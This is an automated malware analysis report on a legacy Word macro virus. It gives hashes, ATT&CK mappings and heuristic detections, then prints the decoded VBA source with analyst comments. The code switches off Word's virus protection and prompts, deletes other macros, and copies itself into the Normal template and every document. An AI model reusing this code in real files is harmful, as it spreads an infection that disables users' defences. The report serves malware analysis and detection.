Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 78d97d0470bab3c0…

MALICIOUS

Office (OLE)

61.5 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 2adc74316c66225f5a12ebec2e78bf65 SHA-1: ccda5d83f73cf76c0e99111a32f96ccd7196594d SHA-256: 78d97d0470bab3c07a4beb77814870d745ed83fa17e0a439c807e1593e611fcb
220 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1547.001 Registry Run Keys / Startup Folder

This document contains VBA macros designed to disable security warnings and modify the Normal template. The script attempts to achieve persistence by writing to the Normal template, so that the macro runs every time a document is opened. The presence of AutoOpen and Document_Open macros, together with the disabling of virus protection, strongly suggests malicious intent.

Heuristics 6

  • ClamAV: Doc.Trojan.Mkill-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Mkill-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE. Note that the Extracted artifacts section below does list a decoded VBA module for this sample, so the "no modern VBA project was recovered" condition of this heuristic should be reconciled against that artifact by the analyst.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45417 bytes
SHA-256: bfe91d65898b089b4abb08060d6c988606d45fc61ab957f90f71685395f2227e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as emitted by olevba: this is the document's ThisDocument class
' module. VB_Base = "1Normal.ThisDocument" together with VB_TemplateDerived = True
' indicates the module was derived from the Normal template's ThisDocument.
'
' Module-level state shared by the event handlers below. VBA typing caveat: in a
' comma-separated Dim only the LAST name takes the declared type, so A1..A3, A5,
' A7, A8 and A10..A13 are actually Variant, not Boolean/Object/Integer/String.
Dim A1, A2, A3, A4 As Boolean
Dim A5, A6 As Object
Dim A7, A8, A16 As Integer
Dim A10, A11, A12, A13, A14 As String
Rem :-D you are marked!.it's just shit
' Infection marker. Every handler below searches a module's source text for this
' literal to decide whether the document and/or the Normal template is already
' "marked"; the string is a useful hunting/signature artifact for this sample.
Const A15 = "I Love Amon"
' Document_Open event: runs when this document is opened. On Error Resume Next
' suppresses every failure, so nothing in this handler is ever surfaced to the user.
Private Sub Document_Open()
On Error Resume Next
' jest (defined further down; its body runs past the visible listing) turns off
' screen updating, alerts, auto-macro blocking and virus protection, then uses
' OrganizerDelete to remove every VBProject component of the active document
' whose name is not "AmonClean" or "ThisDocument".
jest
' First VBProject component of the open document and of the Normal template.
Set A5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set A6 = NormalTemplate.VBProject.VBComponents.Item(1)
' Look for the marker constant A15 in each module's source; the Find arguments
' bound the search to lines 1-100 / columns 1-100 of the module.
A3 = A5.CodeModule.Find(A15, 1, 1, 100, 100)
A4 = A6.CodeModule.Find(A15, 1, 1, 100, 100)
' Disables the conversion prompt, Word's macro virus protection and the
' "save changes to Normal template?" prompt so later template writes are silent.
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
' Normal template module carries no marker: erase its whole code module.
If A4 = False Then
    A6.CodeModule.DeleteLines 1, A6.CodeModule.CountOfLines
End If
' Document module carries no marker: erase its whole code module.
If A3 = False Then
        A5.CodeModule.DeleteLines 1, A5.CodeModule.CountOfLines
End If
End Sub
' Document_Close event: this is where the module copies itself between the
' document and the Normal template. Errors are suppressed for the whole handler.
Private Sub Document_Close()
On Error Resume Next
' Same setup as Document_Open: jest removes non-"AmonClean"/"ThisDocument"
' components and disables alerts/virus protection (jest's body continues past
' the visible listing).
jest
' First VBProject component of the document and of the Normal template.
Set A5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set A6 = NormalTemplate.VBProject.VBComponents.Item(1)
' A3 / A4: is the marker A15 present in the document / Normal template module?
A3 = A5.CodeModule.Find(A15, 1, 1, 100, 100)
A4 = A6.CodeModule.Find(A15, 1, 1, 100, 100)
' Silence conversion, virus-protection and save-Normal prompts.
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
' Proceed only when exactly one of the two modules is marked (Xor) and the
' document is saved as a Word .doc or .dot (wdFormatDocument / wdFormatTemplate).
If (A3 = True Xor A4 = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
      ' Document is marked, Normal is not: replace Normal's module source with
      ' the document's, blank the File > Summary Info fields, and re-save Normal
      ' if it was already in a saved state (keeps the write unnoticeable).
      If A3 = True Then
        A2 = NormalTemplate.Saved
        A11 = A5.CodeModule.Lines(1, A5.CodeModule.CountOfLines)
        A6.CodeModule.DeleteLines 1, A6.CodeModule.CountOfLines
        A6.CodeModule.AddFromString A11
        With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "": .Category = "": .Keywords = "": .Comments = "": .Execute: End With
        If A2 = True Then NormalTemplate.Save
      End If
    ' Normal is marked (or the document has unsaved changes): copy Normal's
    ' module source into the document the same way, then save the document
    ' if it was in a saved state. Note this block is not an Else of the branch
    ' above, so both copies can run within one close.
    If A4 = True Or ActiveDocument.Saved = False Then
     A1 = ActiveDocument.Saved
     A11 = A6.CodeModule.Lines(1, A6.CodeModule.CountOfLines)
     A5.CodeModule.DeleteLines 1, A5.CodeModule.CountOfLines
     A5.CodeModule.AddFromString A11
     With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "": .Category = "": .Keywords = "": .Comments = "": .Execute: End With
     If A1 = True Then ActiveDocument.Save
   End If
End If
End Sub
' Document_New event (spelled Document_new in the sample; VBA names are
' case-insensitive): runs when a new document is created from the template.
' Body is identical to Document_Open; errors are suppressed throughout.
Private Sub Document_new()
On Error Resume Next
' jest: disables alerts/virus protection and deletes VBProject components not
' named "AmonClean" or "ThisDocument" (body continues past the visible listing).
jest
' First VBProject component of the new document and of the Normal template.
Set A5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set A6 = NormalTemplate.VBProject.VBComponents.Item(1)
' Marker search in each module (bounded to lines/columns 1-100).
A3 = A5.CodeModule.Find(A15, 1, 1, 100, 100)
A4 = A6.CodeModule.Find(A15, 1, 1, 100, 100)
' Silence conversion, virus-protection and save-Normal prompts.
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
' Unmarked Normal template module: erase its code.
If A4 = False Then
    A6.CodeModule.DeleteLines 1, A6.CodeModule.CountOfLines
End If
' Unmarked document module: erase its code.
If A3 = False Then
        A5.CodeModule.DeleteLines 1, A5.CodeModule.CountOfLines
End If
End Sub
Private Function jest()
Dim DelFlag As Boolean
Dim DocAmon, TempAmon, DocAmonL, TempAmonL As Boolean
Dim i, x As Integer
Dim MacroNames As String
On Error GoTo Getout
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
DocAmon = False
TempAmon = False
DocAmonL = False
TempAmonL = False
DelFlag = True
Do While (DelFlag)
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
MacroNames = ActiveDocument.VBProject.VBComponents(i).Name
    If MacroNames <> "AmonClean" And MacroNames <> "ThisDocument" Then
     Application.OrganizerDelete Source:=ActiveDocument.FullName, _
     Name:=MacroNames, Object:=wdOrganizerObjectProjectItems
     DelFlag = True
     MsgBox "Find Micro [" & MacroNames & "] ,I shall kill it!" _
    , vbCritical, "Micro Virus Killer Ver. 1.2"
     Exit For
     Else
     DelFlag = False
    End If
Next
Loop
DelFlag = True
Do While (DelFlag)
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
MacroNames = NormalTemplate.VBProject.VBComponents(i).Name
  
... (truncated)